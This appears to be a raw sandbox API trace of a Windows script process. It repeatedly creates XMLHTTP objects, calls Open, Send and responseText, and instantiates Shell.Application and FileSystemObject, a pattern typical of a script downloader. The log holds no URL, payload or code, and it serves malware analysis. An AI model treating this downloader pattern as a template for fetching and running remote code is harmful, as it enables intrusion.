	[0522.766] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0522.766] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0522.766] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0522.766] ??2@YAPEAX_K@Z () returned 0x62f310
	[0522.766] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f310) 
	[0522.767] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0522.767] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0522.767] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0522.767] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0522.767] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0522.767] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0522.767] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0522.767] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0522.767] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0522.767] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0524.243] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0524.243] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0524.243] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0524.243] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0524.243] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0524.244] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0524.244] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0524.244] SysStringLen (param_1=0x0) returned 0x0
	[0524.244] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0524.244] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0524.244] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0524.244] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0524.244] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0524.244] ??2@YAPEAX_K@Z () returned 0x62f350
	[0524.244] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0524.244] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0524.245] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0524.245] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0524.245] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0524.245] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0524.245] SysStringLen (param_1=0x0) returned 0x0
	[0524.245] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0524.248] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0524.248] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0524.248] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0524.248] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0524.248] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0524.249] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0525.312] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0525.312] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0525.312] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0525.313] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0525.314] SysStringLen (param_1=0x0) returned 0x0
	[0525.314] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0525.314] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0525.314] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0525.314] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0525.314] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7c58) returned 0x0
	[0525.314] ??2@YAPEAX_K@Z () returned 0x62f310
	[0525.314] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7c58, pUnkSite=0x62f310) 
	[0525.314] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0525.314] XMLHTTPRequest:IUnknown:Release (This=0x49c7c58) returned 0x0
	[0525.314] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0525.314] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0525.315] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0525.315] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0525.317] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0525.317] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0525.317] SysStringLen (param_1=0x0) returned 0x0
	[0525.318] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0525.318] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0525.318] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0525.318] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0525.318] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0525.318] ??2@YAPEAX_K@Z () returned 0x62f330
	[0525.318] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0525.318] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0525.318] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0525.318] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0525.318] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0525.318] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0525.319] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0525.319] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0525.319] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0525.319] SysStringLen (param_1=0x0) returned 0x0
	[0525.319] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0525.319] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0525.319] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74f0) returned 0x0
	[0525.319] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0525.319] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c58) returned 0x0
	[0525.319] ??2@YAPEAX_K@Z () returned 0x62f310
	[0525.319] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c58, pUnkSite=0x62f310) 
	[0525.319] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0525.319] XMLHTTPRequest:IUnknown:Release (This=0x49c5c58) returned 0x0
	[0525.320] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74f0) returned 0x0
	[0525.320] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74f0) returned 0x3
	[0525.320] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0525.320] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0525.320] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0525.320] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0525.320] SysStringLen (param_1=0x0) returned 0x0
	[0525.320] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0525.320] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
